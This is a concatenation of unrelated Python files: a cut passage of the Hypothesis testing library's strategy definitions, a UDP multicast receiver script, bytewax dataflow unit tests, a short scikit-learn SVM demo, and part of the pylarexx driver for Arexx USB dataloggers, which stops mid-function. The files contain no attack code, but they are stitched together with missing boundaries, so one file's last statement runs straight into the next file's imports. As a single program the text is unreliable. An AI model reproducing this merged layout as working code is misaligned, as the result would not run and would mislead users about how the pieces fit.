fn(*args, **kwargs) cache[cache_key] = result return result return cached_strategy def defines_strategy(strategy_definition): from hypothesis.searchstrategy.deferred import DeferredStrategy @proxies(strategy_definition) def accept(*args, **kwargs): return DeferredStrategy(strategy_definition, args, kwargs) return accept def just(value): """Return a strategy which only generates value. Note: value is not copied. Be wary of using mutable values. """ from hypothesis.searchstrategy.misc import JustStrategy def calc_repr(): return 'just(%s)' % (repr(value),) return ReprWrapperStrategy(JustStrategy(value), calc_repr) @defines_strategy def none(): """Return a strategy which only generates None.""" return just(None) def one_of(arg, *args): """Return a strategy which generates values from any of the argument strategies.""" if not args: check_strategy(arg) return arg from hypothesis.searchstrategy.strategies import OneOfStrategy args = (arg,) + args for arg in args: check_strategy(arg) return OneOfStrategy(args) @cacheable @defines_strategy def integers(min_value=None, max_value=None): """Returns a strategy which generates integers (in Python 2 these may be ints or longs). If min_value is not None then all values will be >= min_value. If max_value is not None then all values will be <= max_value """ check_valid_integer(min_value) check_valid_integer(max_value) check_valid_interval(min_value, max_value, 'min_value', 'max_value') from hypothesis.searchstrategy.numbers import IntegersFromStrategy, \ BoundedIntStrategy, RandomGeometricIntStrategy, WideRangeIntStrategy if min_value is None: if max_value is None: return ( RandomGeometricIntStrategy() | WideRangeIntStrategy() ) else: return IntegersFromStrategy(0).map(lambda x: max_value - x) else: if max_value is None: return IntegersFromStrategy(min_value) else: if min_value == max_value: return just(min_value) return BoundedIntStrategy(min_value, max_value) @cacheable @defines_strategy def booleans(): """Returns a strategy which generates instances of bool.""" from hypothesis.searchstrategy.misc import BoolStrategy return BoolStrategy() def is_negative(x): return math.copysign(1, x) < 0 def count_between_floats(x, y): assert x <= y if is_negative(x): if is_negative(y): return float_to_int(x) - float_to_int(y) + 1 else: return count_between_floats(x, -0.0) + count_between_floats(0.0, y) else: assert not is_negative(y) return float_to_int(y) - float_to_int(x) + 1 def float_to_int(value): return ( struct.unpack(b'!Q', struct.pack(b'!d', value))[0] ) def int_to_float(value): return ( struct.unpack(b'!d', struct.pack(b'!Q', value))[0] ) @cacheable @defines_strategy def floats( min_value=None, max_value=None, allow_nan=None, allow_infinity=None ): """Returns a strategy which generates floats. - If min_value is not None, all values will be >= min_value. - If max_value is not None, all values will be <= max_value. - If min_value or max_value is not None, it is an error to enable allow_nan. - If both min_value and max_value are not None, it is an error to enable allow_infinity. Where not explicitly ruled out by the bounds, all of infinity, -infinity and NaN are possible values generated by this strategy. """ if allow_nan is None: allow_nan = bool(min_value is None and max_value is None) elif allow_nan: if min_value is not None or max_value is not None: raise InvalidArgument( 'Cannot have allow_nan=%r, with min_value or max_value' % ( allow_nan )) check_valid_bound(min_value, 'min_value') check_valid_bound(max_value, 'max_value') check_valid_interval(min_value, max_value, 'min_value', 'max_value') if min_value is not None: min_value = float(min_value) if max_value is not None: max_value = float(max_value) if min_value == float(u'-inf'): min_value = None if max_value == float(u'inf'): max_value = None if allow_infinity is None: allow_infinity = bool(min_value is None or max_value is None) elif allow_infinity: if min_value is not None and max_value is not None: raise InvalidArgument( 'Cannot have allow_infinity=%r, with both min_value and ' 'max_value' % ( allow_infinity )) from hypothesis.searchstrategy.numbers import WrapperFloatStrategy, \ GaussianFloatStrategy, BoundedFloatStrategy, ExponentialFloatStrategy,\ JustIntFloats, NastyFloats, FullRangeFloats, \ FixedBoundedFloatStrategy if min_value is None and max_value is None: return WrapperFloatStrategy( GaussianFloatStrategy() | BoundedFloatStrategy() | ExponentialFloatStrategy() | JustIntFloats() | NastyFloats(allow_nan, allow_infinity) | FullRangeFloats(allow_nan, allow_infinity) ) elif min_value is not None and max_value is not None: if min_value == max_value: return just(min_value) elif math.isinf(max_value - min_value): assert min_value < 0 and max_value > 0 return floats(min_value=0, max_value=max_value) | floats( min_value=min_value, max_value=0 ) elif count_between_floats(min_value, max_value) > 1000: critical_values = [ min_value, max_value, min_value + (max_value - min_value) / 2] if min_value <= 0 <= max_value: if not is_negative(max_value): critical_values.append(0.0) if is_negative(min_value): critical_values.append(-0.0) return FixedBoundedFloatStrategy( lower_bound=min_value, upper_bound=max_value ) | sampled_from(critical_values) elif is_negative(max_value): assert is_negative(min_value) ub_int = float_to_int(max_value) lb_int = float_to_int(min_value) assert ub_int <= lb_int return integers(min_value=ub_int, max_value=lb_int).map( int_to_float ) elif is_negative(min_value): return floats(min_value=min_value, max_value=-0.0) | floats( min_value=0, max_value=max_value ) else: ub_int = float_to_int(max_value) lb_int = float_to_int(min_value) assert lb_int <= ub_int return integers(min_value=lb_int, max_value=ub_int).map( int_to_float ) elif min_value is not None: critical_values = [min_value] if allow_infinity: critical_values.append(float(u'inf')) if is_negative(min_value): critical_values.append(-0.0) if min_value <= 0: critical_values.append(0.0) return ( floats(allow_infinity=allow_infinity, allow_nan=False).map( lambda x: assume(not math.isnan(x)) and min_value + abs(x) ) ) | sampled_from(critical_values) else: assert max_value is not None critical_values = [max_value] if allow_infinity: critical_values.append(float(u'-inf')) if max_value >= 0: critical_values.append(-0.0) if not is_negative(max_value): critical_values.append(0.0) return ( floats(allow_infinity=allow_infinity, allow_nan=False).map( lambda x: assume(not math.isnan(x)) and max_value - abs(x) ) ) | sampled_from(critical_values) @cacheable @defines_strategy def complex_numbers(): """Returns a strategy that generates complex numbers.""" from hypothesis.searchstrategy.numbers import ComplexStrategy return ComplexStrategy( tuples(floats(), floats()) ) @cacheable @defines_strategy def tuples(*args): """Return a strategy which generates a tuple of the same length as args by generating the value at index i from args[i]. e.g. tuples(integers(), integers()) would generate a tuple of length two with both values an integer. """ for arg in args: check_strategy(arg) from hypothesis.searchstrategy.collections import TupleStrategy return TupleStrategy(args, tuple) @defines_strategy def sampled_from(elements): """Returns a strategy which generates any value present in the iterable elements. Note that as with just, values will not be copied and thus you should be careful of using mutable data """ from hypothesis.searchstrategy.misc import SampledFromStrategy, \ JustStrategy elements = tuple(iter(elements)) if not elements: raise InvalidArgument( 'sampled_from requires at least one value' ) if len(elements) == 1: return JustStrategy(elements[0]) else: return SampledFromStrategy(elements) @cacheable @defines_strategy def lists( elements=None, min_size=None, average_size=None, max_size=None, unique_by=None, unique=False, ): """Returns a list containing values drawn from elements length in the interval [min_size, max_size] (no bounds in that direction if these are None). If max_size is 0 then elements may be None and only the empty list will be drawn. average_size may be used as a size hint to roughly control the size of list but it may not be the actual average of sizes you get, due to a variety of factors. If unique is True (or something that evaluates to True), we compare direct object equality, as if unique_by was `lambda x: x`. This comparison only works for hashable types. if unique_by is not None it must be a function returning a hashable type when given a value drawn from elements. The resulting list will satisfy the condition that for i != j, unique_by(result[i]) != unique_by(result[j]). """ if unique: if unique_by is not None: raise InvalidArgument(( 'cannot specify both unique and unique_by (you probably only ' 'want to set unique_by)' )) else: unique_by = lambda x: x if unique_by is not None: from hypothesis.searchstrategy.collections import UniqueListStrategy if max_size == 0: return builds(list) check_strategy(elements) if min_size is not None and elements.template_upper_bound < min_size: raise InvalidArgument(( 'Cannot generate unique lists of size %d from %r, which ' 'contains no more than %d distinct values') % ( min_size, elements, elements.template_upper_bound, )) min_size = min_size or 0 max_size = max_size or float(u'inf') max_size = min(max_size, elements.template_upper_bound) if average_size is None: if max_size < float(u'inf'): if max_size <= 5: average_size = min_size + 0.75 * (max_size - min_size) else: average_size = (max_size + min_size) / 2 else: average_size = max( _AVERAGE_LIST_LENGTH, min_size * 2 ) check_valid_sizes(min_size, average_size, max_size) result = UniqueListStrategy( elements=elements, average_size=average_size, max_size=max_size, min_size=min_size, key=unique_by ) return result check_valid_sizes(min_size, average_size, max_size) from hypothesis.searchstrategy.collections import ListStrategy, \ SingleElementListStrategy if min_size is None: min_size = 0 if average_size is None: if max_size is None: average_size = _AVERAGE_LIST_LENGTH else: average_size = (min_size + max_size) * 0.5 if elements is None or (max_size is not None and max_size <= 0): if max_size is None or max_size > 0: raise InvalidArgument( 'Cannot create non-empty lists without an element type' ) else: return ListStrategy(()) else: check_strategy(elements) if elements.template_upper_bound == 1: from hypothesis.searchstrategy.numbers import IntegersFromStrategy if max_size is None: length_strat = IntegersFromStrategy( min_size, average_size=average_size - min_size) else: length_strat = integers(min_size, max_size) return SingleElementListStrategy(elements, length_strat) return ListStrategy( (elements,), average_length=average_size, min_size=min_size, max_size=max_size, ) @cacheable @defines_strategy def sets(elements=None, min_size=None, average_size=None, max_size=None): """This has the same behaviour as lists, but returns sets instead. Note that Hypothesis cannot tell if values are drawn from elements are hashable until running the test, so you can define a strategy for sets of an unhashable type but it will fail at test time. """ return lists( elements=elements, min_size=min_size, average_size=average_size, max_size=max_size, unique=True ).map(set) @cacheable @defines_strategy def frozensets(elements=None, min_size=None, average_size=None, max_size=None): """This is identical to the sets function but instead returns frozensets.""" return lists( elements=elements, min_size=min_size, average_size=average_size, max_size=max_size, unique=True ).map(frozenset) @defines_strategy def fixed_dictionaries(mapping): """Generate a dictionary of the same type as mapping with a fixed set of keys mapping to strategies. mapping must be a dict subclass. Generated values have all keys present in mapping, with the corresponding values drawn from mapping[key]. If mapping is an instance of OrderedDict the keys will also be in the same order, otherwise the order is arbitrary. """ from hypothesis.searchstrategy.collections import FixedKeysDictStrategy check_type(dict, mapping) for v in mapping.values(): check_type(SearchStrategy, v) return FixedKeysDictStrategy(mapping) @cacheable @defines_strategy def dictionaries( keys, values, dict_class=dict, min_size=None, average_size=None, max_size=None ): """Generates dictionaries of type dict_class with keys drawn from the keys argument and values drawn from the values argument. The size parameters have the same interpretation as for lists. """ check_valid_sizes(min_size, average_size, max_size) if max_size == 0: return fixed_dictionaries(dict_class()) check_strategy(keys) check_strategy(values) if min_size is not None and min_size > keys.template_upper_bound: raise InvalidArgument(( 'Cannot generate dictionaries of size %d with keys from %r, ' 'which contains no more than %d distinct values') % ( min_size, keys, keys.template_upper_bound, )) if max_size is None: max_size = keys.template_upper_bound else: max_size = min(max_size, keys.template_upper_bound) return lists( tuples(keys, values), min_size=min_size, average_size=average_size, max_size=max_size, unique_by=lambda x: x[0] ).map(dict_class) @cacheable @defines_strategy def streaming(elements): """Generates an infinite stream of values where each value is drawn from elements. The result is iterable (the iterator will never terminate) and indexable. """ check_strategy(elements) from hypothesis.searchstrategy.streams import StreamStrategy return StreamStrategy(elements) @cacheable @defines_strategy def characters(whitelist_categories=None, blacklist_categories=None, blacklist_characters=None, min_codepoint=None, max_codepoint=None): """Generates unicode text type (unicode on python 2, str on python 3) characters following specified filtering rules. This strategy accepts lists of Unicode categories, characters of which should (`whitelist_categories`) or should not (`blacklist_categories`) be produced. Also there could be applied limitation by minimal and maximal produced code point of the characters. If you know what exactly characters you don't want to be produced, pass them with `blacklist_characters` argument. """ from hypothesis.searchstrategy.strings import OneCharStringStrategy return OneCharStringStrategy(whitelist_categories=whitelist_categories, blacklist_categories=blacklist_categories, blacklist_characters=blacklist_characters, min_codepoint=min_codepoint, max_codepoint=max_codepoint) @cacheable @defines_strategy def text( alphabet=None, min_size=None, average_size=None, max_size=None ): """Generates values of a unicode text type (unicode on python 2, str on python 3) with values drawn from alphabet, which should be an iterable of length one strings or a strategy generating such. If it is None it will default to generating the full unicode range. If it is an empty collection this will only generate empty strings. min_size, max_size and average_size have the usual interpretations. """ from hypothesis.searchstrategy.strings import OneCharStringStrategy, \ StringStrategy if alphabet is None: char_strategy = OneCharStringStrategy(blacklist_categories=['Cs']) elif not alphabet: if (min_size or 0) > 0: raise InvalidArgument( 'Invalid min_size %r > 0 for empty alphabet' % ( min_size, ) ) return just(u'') elif isinstance(alphabet, SearchStrategy): char_strategy = alphabet else: char_strategy = sampled_from(list(map(text_type, alphabet))) return StringStrategy(lists( char_strategy, average_size=average_size, min_size=min_size, max_size=max_size )) @cacheable @defines_strategy def binary( min_size=None, average_size=None, max_size=None ): """Generates the appropriate binary type (str in python 2, bytes in python 3). min_size, average_size and max_size have the usual interpretations. """ from hypothesis.searchstrategy.strings import BinaryStringStrategy return BinaryStringStrategy( lists( integers(min_value=0, max_value=255), average_size=average_size, min_size=min_size, max_size=max_size ) ) @cacheable @defines_strategy def randoms(): """Generates instances of Random (actually a Hypothesis specific RandomWithSeed class which displays what it was initially seeded with)""" from hypothesis.searchstrategy.misc import RandomStrategy return RandomStrategy(integers()) class RandomSeeder(object): def __init__(self, seed): self.seed = seed def __repr__(self): return 'random.seed(%r)' % (self.seed,) @cacheable @defines_strategy def random_module(): """If your code depends on the global random module then you need to use this. It will explicitly seed the random module at the start of your test so that tests are reproducible. The value it passes you is an opaque object whose only useful feature is that its repr displays the random seed. It is not itself a random number generator. If you want a random number generator you should use the randoms() strategy which will give you one. """ from hypothesis.control import cleanup import random def seed_random(seed): state = random.getstate() random.seed(seed) cleanup(lambda: random.setstate(state)) return RandomSeeder(seed) return shared( integers().map(seed_random), 'hypothesis.strategies.random_module()', ) @cacheable @defines_strategy def fractions(): """Generates instances of fractions.Fraction.""" from fractions import Fraction return tuples(integers(), integers(min_value=1)).map( lambda t: Fraction(*t) ) @cacheable @defines_strategy def decimals(): """Generates instances of decimals.Decimal.""" return ( floats().map(float_to_decimal) | fractions().map( lambda f: Decimal(f.numerator) / f.denominator ) ) @cacheable @defines_strategy def builds(target, *args, **kwargs): """Generates values by drawing from args and kwargs and passing them to target in the appropriate argument position. e.g. builds(target, integers(), flag=booleans()) would draw an integer i and a boolean b and call target(i, flag=b). """ return tuples(tuples(*args), fixed_dictionaries(kwargs)).map( lambda value: target(*value[0], **value[1]) ) @defines_strategy def recursive(base, extend, max_leaves=100): """ base: A strategy to start from. extend: A function which takes a strategy and returns a new strategy. max_leaves: The maximum number of elements to be drawn from base on a given run. This returns a strategy S such that S = extend(base | S). That is, values maybe drawn from base, or from any strategy reachable by mixing applications of | and extend. An example may clarify: recursive(booleans(), lists) would return a strategy that may return arbitrarily nested and mixed lists of booleans. So e.g. False, [True], [False, []], [[[[True]]]], are all valid values to be drawn from that strategy. """ check_strategy(base) extended = extend(base) if not isinstance(extended, SearchStrategy): raise InvalidArgument( 'Expected extend(%r) to be a SearchStrategy but got %r' % ( base, extended )) from hypothesis.searchstrategy.recursive import RecursiveStrategy return RecursiveStrategy(base, extend, max_leaves) @defines_strategy def permutations(values): """Return a strategy which returns permutations of the collection "values".""" values = list(values) if not values: return just(()).map(lambda _: []) def build_permutation(swaps): initial = list(values) for i, j in swaps: initial[i], initial[j] = initial[j], initial[i] return initial n = len(values) index = integers(0, n - 1) return lists(tuples(index, index), max_size=n ** 2).map(build_permutation) @cacheable def composite(f): """Defines a strategy that is built out of potentially arbitrarily many other strategies. This is intended to be used as a decorator. See the full documentation for more details about how to use this function. """ from hypothesis.searchstrategy.morphers import MorpherStrategy from hypothesis.internal.reflection import copy_argspec argspec = getargspec(f) if ( argspec.defaults is not None and len(argspec.defaults) == len(argspec.args) ): raise InvalidArgument( 'A default value for initial argument will never be used') if len(argspec.args) == 0 and not argspec.varargs: raise InvalidArgument( 'Functions wrapped with composite must take at least one ' 'positional argument.' ) new_argspec = ArgSpec( args=argspec.args[1:], varargs=argspec.varargs, keywords=argspec.keywords, defaults=argspec.defaults ) base_strategy = streaming(MorpherStrategy()) @defines_strategy @copy_argspec(f.__name__, new_argspec) def accept(*args, **kwargs): def call_with_draw(morphers): index = [0] def draw(strategy): i = index[0] index[0] += 1 return morphers[i].become(strategy) return f(*((draw,) + args), **kwargs) return base_strategy.map(call_with_draw) return accept def shared(base, key=None): """Returns a strategy that draws a single shared value per run, drawn from base. Any two shared instances with the same key will share the same value, otherwise the identity of this strategy will be used. That is: >>> x = shared(s) >>> y = shared(s) In the above x and y may draw different (or potentially the same) values. In the following they will always draw the same: >>> x = shared(s, key="hi") >>> y = shared(s, key="hi") """ from hypothesis.searchstrategy.shared import SharedStrategy return SharedStrategy(base, key) @cacheable def choices(): """Strategy that generates a function that behaves like random.choice. Will note choices made for reproducibility. """ from hypothesis.control import note, current_build_context def build_chooser(stream): index = [-1] choice_count = [0] context = current_build_context() context.mark_captured() def choice(values): if not values: raise IndexError('Cannot choose from empty sequence') k = len(values) - 1 if k == 0: chosen = 0 else: mask = _right_saturate(k) while True: index[0] += 1 probe = stream[index[0]] & mask if probe <= k: chosen = probe break choice_count[0] += 1 result = values[chosen] with context.local(): note('Choice #%d: %r' % (choice_count[0], result)) return result return choice return ReprWrapperStrategy( shared( builds(build_chooser, streaming(integers(min_value=0))), key='hypothesis.strategies.chooser.choice_function' ), 'chooser()') @cacheable def uuids(): """Returns a strategy that generates UUIDs. All returned values from this will be unique, so e.g. if you do lists(uuids()) the resulting list will never contain duplicates. """ from uuid import UUID return ReprWrapperStrategy( shared(randoms(), key='hypothesis.strategies.uuids.generator').map( lambda r: UUID(int=r.getrandbits(128)) ), 'uuids()') # Private API below here def _right_saturate(x): x |= (x >> 1) x |= (x >> 2) x |= (x >> 4) x |= (x >> 8) x |= (x >> 16) x |= (x >> 32) return x def check_type(typ, arg): if not isinstance(arg, typ): if isinstance(typ, type): typ_string = typ.__name__ else: typ_string = 'one of %s' % ( ', '.join(t.__name__ for t in typ)) raise InvalidArgument( 'Expected %s but got %r' % (typ_string, arg,)) def check_strategy(arg): check_type(SearchStrategy, arg) def check_valid_integer(value): """Checks that value is either unspecified, or a valid integer. Otherwise raises InvalidArgument. """ if value is None: return check_type(integer_types, value) def check_valid_bound(value, name): """Checks that value is either unspecified, or a valid interval bound. Otherwise raises InvalidArgument. """ if value is None: return if math.isnan(value): raise InvalidArgument(u'Invalid end point %s %r' % (value, name)) def check_valid_size(value, name): """Checks that value is either unspecified, or a valid non-negative size expressed as an integer/float. Otherwise raises InvalidArgument. """ if value is None: return check_type(integer_types + (float,), value) if value < 0: raise InvalidArgument(u'Invalid size %s %r < 0' % (value, name)) if isinstance(value, float) and math.isnan(value): raise InvalidArgument(u'Invalid size %s %r' % (value, name)) def check_valid_interval(lower_bound, upper_bound, lower_name, upper_name): """Checks that lower_bound and upper_bound are either unspecified, or they define a valid interval on the number line. Otherwise raises InvalidArgumet. """ if lower_bound is None or upper_bound is None: return if upper_bound < lower_bound: raise InvalidArgument( 'Cannot have %s=%r < %s=%r' % ( upper_name, upper_bound, lower_name, lower_bound )) def check_valid_sizes(min_size, average_size, max_size): check_valid_size(min_size, 'min_size') check_valid_size(max_size, 'max_size') check_valid_size(average_size, 'average_size') check_valid_interval(min_size, max_size, 'min_size', 'max_size') check_valid_interval(average_size, max_size, 'average_size', 'max_size') check_valid_interval(min_size, average_size, 'min_size', 'average_size') if average_size is not None: if ( (max_size is None or max_size > 0) and average_size is not None and average_size <= 0.0 ): raise InvalidArgument( 'Cannot have average_size=%r < min_size=%r' % ( average_size, min_size )) _AVERAGE_LIST_LENGTH = 25.0 mcReceiver.py import socket import struct multicastIP = '192.168.3.11' multicastPort = 5007 IS_ALL_GROUPS = True sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if IS_ALL_GROUPS: # on this port, receives ALL multicast groups sock.bind(('', multicastPort)) else: # on this port, listen ONLY to multicastIP sock.bind((multicastIP, multicastPort)) msgReq = struct.pack("4sl", socket.inet_aton(multicastIP), socket.INADDR_ANY) sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, msgReq) while True: print(sock.recv(10240))import bytewax import pytest def test_map(): out = [] def add_one(item): return item + 1 ec = bytewax.Executor() flow = ec.Dataflow( [ (0, 0), (0, 1), (0, 2), ] ) flow.map(add_one) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ (0, 1), (0, 2), (0, 3), ] ) def test_flat_map(): out = [] def split_into_words(sentence): return sentence.split() ec = bytewax.Executor() flow = ec.Dataflow( [ (1, "split this"), ] ) flow.flat_map(split_into_words) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ (1, "split"), (1, "this"), ] ) def test_filter(): out = [] def is_odd(item): return item % 2 != 0 ec = bytewax.Executor() flow = ec.Dataflow( [ (0, 1), (0, 2), (0, 3), ] ) flow.filter(is_odd) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted([(0, 1), (0, 3)]) def test_inspect(): out = [] ec = bytewax.Executor() flow = ec.Dataflow( [ (1, "a"), ] ) flow.inspect(out.append) ec.build_and_run() assert out == ["a"] def test_inspect_epoch(): out = [] ec = bytewax.Executor() flow = ec.Dataflow( [ (1, "a"), ] ) flow.inspect_epoch(lambda epoch, item: out.append((epoch, item))) ec.build_and_run(ctrlc=False) assert out == [(1, "a")] def test_reduce(): out = [] def user_as_key(event): return (event["user"], [event]) def extend_session(session, event): return session + event def session_complete(session): return any(event["type"] == "logout" for event in session) ec = bytewax.Executor() flow = ec.Dataflow( [ (0, {"user": "a", "type": "login"}), (1, {"user": "a", "type": "post"}), (1, {"user": "b", "type": "login"}), (2, {"user": "a", "type": "logout"}), (3, {"user": "b", "type": "logout"}), ] ) flow.map(user_as_key) flow.reduce(extend_session, session_complete) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ ( 2, ( "a", [ {"user": "a", "type": "login"}, {"user": "a", "type": "post"}, {"user": "a", "type": "logout"}, ], ), ), ( 3, ( "b", [ {"user": "b", "type": "login"}, {"user": "b", "type": "logout"}, ], ), ), ] ) def test_reduce_epoch(): out = [] def add_initial_count(event): return event["user"], 1 def count(count, event_count): return count + event_count ec = bytewax.Executor() flow = ec.Dataflow( [ (0, {"user": "a", "type": "login"}), (0, {"user": "a", "type": "post"}), (0, {"user": "b", "type": "login"}), (1, {"user": "b", "type": "post"}), ] ) flow.map(add_initial_count) flow.reduce_epoch(count) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ (0, ("a", 2)), (0, ("b", 1)), (1, ("b", 1)), ] ) def test_reduce_epoch_local(): # Can't run multiple workers from code yet. pass def test_stateful_map(): out = [] def build_seen(): return set() def add_key(item): return item, item def check(seen, value): if value in seen: return seen, True else: seen.add(value) return seen, False def remove_seen(key__is_seen): key, is_seen = key__is_seen if not is_seen: return [key] else: return [] ec = bytewax.Executor() flow = ec.Dataflow( [ (0, "a"), (0, "a"), (1, "a"), (1, "b"), ] ) flow.map(add_key) flow.stateful_map(build_seen, check) flow.flat_map(remove_seen) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted( [ (0, "a"), (1, "b"), ] ) def test_capture(): out = [] inp = [ (0, "a"), (1, "b"), ] ec = bytewax.Executor() flow = ec.Dataflow(inp) flow.capture(out.append) ec.build_and_run(ctrlc=False) assert sorted(out) == sorted(inp) import numpy as np from sklearn import svm X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]]) Y = np.array([1, 1, 2, 2]) clf = svm.SVC(gamma='auto') print(type(clf)) clf.fit(X, Y) print(clf.support_vectors_) print(clf.n_support_) V1 = [-2, -2] V2 = [2, 2] V = [V1,V2] print(clf.predict([V1])) print(clf.predict([V2])) print(clf.predict(V))''' Created on 23.11.2017 @author: @license: pylarexx is licensed under the Apache License, version 2, see License.txt ''' import usb.core import time import math import array import datalogger.Sensor import datalogger.DataListener from datalogger.DataListener import DataListener import logging import yaml from datalogger.Sensor import ArexxSensorDetector from datetime import datetime from pprint import pformat # import traceback class TLX00(object): ''' This class handles USB connection and communication for Arexx TL-300 and TL-500 devices and BS-510 ''' TIME_OFFSET = 946681200 # Timestamp of 2000-01-01 00:00:00 def __init__(self, params): self.devices=[] self.listeners=[] self.sensors={} self.requestBuffer = array.array('B', [0]*64) self.config={} self.detectUnknownSensors=True self.lastDeviceCheck=0 if 'conffile' in params: self.readConfigFile(params['conffile']) ## This method extract the information stored in the config file /etc/pylarexx.yml with the differnt config sections ## def readConfigFile(self,filename): with open(filename) as f: content=f.read() self.config=yaml.load(content) logging.debug(self.config) if 'sensors' in self.config: try: for sensor in self.config['sensors']: sensorid=int(sensor['id']) sensortype=None if 'type' in sensor: sensortype=sensor['type'] name = None if 'name' in sensor: name=sensor['name'] logging.info("Adding Sensor from config file: %d %s %s"%(sensorid,sensortype,name)) # Todo: Sensortype weg machen if sensortype in ('TL-3TSN','TSN-50E','TSN-EXT44','TSN-33MN'): self.sensors[sensorid]=datalogger.Sensor.ArexxTemperatureSensor(sensorid,sensortype,name) elif sensortype in ('TSN-TH70E', 'TSN-TH77ext'): self.sensors[sensorid]=datalogger.Sensor.ArexxTemperatureSensor(sensorid,sensortype,name) self.sensors[sensorid+1]=datalogger.Sensor.ArexxHumiditySensor(sensorid+1,sensortype,name) else: detected_sensor = self.detectSensor(sensorid, name) if detected_sensor != False: self.addSensor(detected_sensor) else: self.sensors[sensorid]= datalogger.Sensor.Sensor(sensorid) self.sensors[sensorid].setName(name) except Exception as e: logging.error('Error in config section sensors: %s',e) logging.debug('Stacktrace: ',exc_info=True) if 'calibration' in self.config: for c in self.config['calibration']: try: sensorid=int(c['id']) if not sensorid in self.sensors: logging.error('Calibration values found for sensor %i, but sensor not defined in config',sensorid) continue; for n,v in c['values'].items(): self.sensors[sensorid].calibrationValues[n] = float(v) logging.debug("Calibration value for sensor %d oder %d value %f"%(sensorid,n,float(v))) except Exception as e: logging.error('Error in config section calibration: %s',e) logging.debug('Stacktrace: ',exc_info=True) if 'output' in self.config: for logger in self.config['output']: try: loggerType = logger.get('type') params= logger.get('params',{}) listenerClass = getattr(datalogger.DataListener,loggerType) self.registerDataListener(listenerClass(params)) except Exception as e: logging.error('Error in config section output: %s',e) logging.debug('Stacktrace: ',exc_info=True) if 'config' in self.config: if 'DetectUnknownSensors' in self.config['config']: self.detectUnknownSensors=bool(self.config['config']['DetectUnknownSensors']) # detect sensor and return it. Returns False, if no sensor was detected. # If detectUnknownSensors is set to false, return a sensor only if it is in config via displayid def detectSensor(self,sensorid,name=None): detector = ArexxSensorDetector() detected_sensor = detector.detectDevice(sensorid) is_in_config=False if detected_sensor != False: logging.debug("Detected Sensor: %s(%s)" % (detected_sensor.id, detected_sensor.type) ) if name != None: detected_sensor.setName(name) else:# check if we have a sensor in config with the same display id. Then copy name for sensor in self.sensors.items(): if sensor[0] == detected_sensor.displayid: detected_sensor.setName(sensor[1].name) logging.info("Setting name of detected sensor to: %s" % detected_sensor.name) is_in_config=True if self.detectUnknownSensors or is_in_config: return detected_sensor return False # checks if data match to sensor value range and time def validateSensorData(self,data,sensor): if abs(time.time() - data["timestamp"]) > 4000: # On DST changes we can get 3600sec difference. logging.info("validateSensorData: timestamp %s is stale. Is a buffering receiver used?", datetime.fromtimestamp(data["timestamp"]).strftime('%Y-%m-%d %H:%M:%S')) cooked=sensor.rawToCooked(data["rawvalue"]) if cooked > sensor.valmax or cooked < sensor.valmin: logging.info("validateSensorData: Datapoint %f outside range (%f/%f). Ignoring." % (cooked, sensor.valmin, sensor.valmax)) return False return True def addSensor(self,detected_sensor): logging.info("Adding Sensor %s", detected_sensor.name) self.sensors[detected_sensor.id] = detected_sensor def removeSensor(self,sensorid): logging.info("Removing Sensor %s", self.sensors[sensorid].name) self.sensors.pop(sensorid) # Method to reset the requestBuffer to 0 to have a clean starting buffer def clearRequestBuffer(self): for i in range(0,63): self.requestBuffer[i]=0 # this method looks for logger attached via USB on the system def findDevices(self): self.lastDeviceCheck = math.floor(time.time()) founddevices = usb.core.find(find_all= True, idVendor=0x0451, idProduct=0x3211) self.devices = list(founddevices) if self.devices is not None: logging.info("Found Arexx Datalogger device(s) at ") for d in self.devices: d.lastTimeDataRead = 0 d.deviceErrors = 0 d.lastTimeSync = 0 d.lastTimeDelete = 0 logging.info("Bus %d Address %d Port Number %d " % (d.bus,d.address,d.port_number)) return True logging.error("No device found") return False def checkForNewDevices(self): self.lastDeviceCheck = math.floor(time.time()) founddevices = usb.core.find(find_all= True, idVendor=0x0451, idProduct=0x3211) numdevices = len(list(founddevices)) if numdevices != len(self.devices): return True return False def initializeDevices(self): for d in self.devices: try: d.set_configuration() cfg = d.get_active_configuration() intf = cfg[(0,0)] epo = usb.util.find_descriptor(intf, custom_match = lambda e: usb.util.endpoint_direction(e.bEndpointAddress) == usb.util.ENDPOINT_OUT) epi = usb.util.find_descriptor(intf, custom_match = lambda e: usb.util.endpoint_direction(e.bEndpointAddress) == usb.util.ENDPOINT_IN ) d.outAddress = epo.bEndpointAddress d.inAddress = epi.bEndpointAddress logging.info("Device on Bus %d Address %d Port Number %d uses Addresses %d/%d for in/out" % (d.bus,d.address,d.port_number,d.inAddress,d.outAddress)) self.setTime(d) except Exception as e: logging.error("Error initializing device at Bus %d Address %d Port Number %d. Resetting and removing device" % (d.bus,d.address,d.port_number)) logging.error("Error Message: %s" % e) try: d.reset() except Exception as ne: logging.error("Error resetting device: %s" % ne) self.devices.remove(d) # Method to set the time on the logging device def setTime(self,device): logging.debug("Setting time for USB device at Bus %d Address %d Port Number %d" % (device.bus,device.address,device.port_number)) # set mode self.clearRequestBuffer() self.requestBuffer[0]=4 # Protocol.txt says with type 04 the time can be set on the device # put time in array t=math.floor(time.time())-self.TIME_OFFSET tb=t.to_bytes(4,byteorder='little') for i in range(0,4): self.requestBuffer[i+1]=tb[i] # The created buffer will tell the BS-XX0 to ge ready for a time setting. # the buffer containts the type 4 message and the datetime in u32le format # send data try: device.write(device.outAddress,self.requestBuffer,1000) # write to device at defined addres, write the buffer with time data ,timeout is 1000s device.read(device.inAddress,64,1000) # read at device address,get the 64 byte long message, timeout is 1000s device.lastTimeSync=int(time.time()) # set the actuel time since when the last sync has been performed except Exception as e: logging.error("Error setting time: %s",e) # Mehtod will delete the internal flash data of the Logger. this done by preparing the buffer and send it to the logger def deleteDeviceData(self,device): logging.debug("deleting internal Flash data of USB device at Bus %d Address %d Port Number %d" % (device.bus,device.address,device.port_number)) # set mode self.clearRequestBuffer() self.requestBuffer[0]=0x0d # this mode will delete the flash memory of the device 